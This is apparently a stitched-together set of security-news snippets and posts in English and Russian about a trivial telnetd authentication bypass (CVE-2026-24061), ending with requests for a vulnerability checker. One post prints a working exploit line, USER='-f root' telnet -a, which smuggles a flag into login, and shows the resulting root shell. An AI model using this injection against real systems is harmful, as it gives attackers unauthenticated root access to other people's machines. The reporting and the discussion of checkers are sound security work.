This Week In Security: Getting Back Up to Speed
This Week In Security: Getting Back Up to Speed
Warning: computer nerd stuff below:
So. In 2026, telnet is still a thing.
Really? 😑
ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address
[usual Ubuntu /etc/issue text]
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
You’re welcome.
Security Week 2605: тривиальная ошибка в telnetd
20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной для описания уязвимости терминологии суть проблемы заключается в следующем: «ошибка в обработке входящих данных позволяет злоумышленнику пропустить процесс аутентификации и получить на подверженной уязвимости системе права суперпользователя». Применение таких терминов обычно обозначает, что подлинное описание проблемы либо слишком длинное, либо слишком сложное для понимания, но в данном случае это не так. При подключении к telnetd нужно указать имя пользователя. Его программа передает стандартной утилите login , причем передача осуществляется без предварительной проверки ввода от желающего подключиться. Если указать вместо имени пользователя строку «-f root», эти данные будут переданы в утилиту login, а она уже залогинит любого желающего под рутом без какой-либо авторизации, увидев соответствующий ключ -f. Собственно, это вся уязвимость как есть.
I've successfully tested the PoC in the #SafeBreach Labs GitHub repository. It seems like a good place to start to write a checker (if there isn't a good one).
Any good, legitimate checker around for CVE-2026-24061 ?
Exploitation is trivial, checking for the vulnerability, not so much.
Exploitation is completely trivial...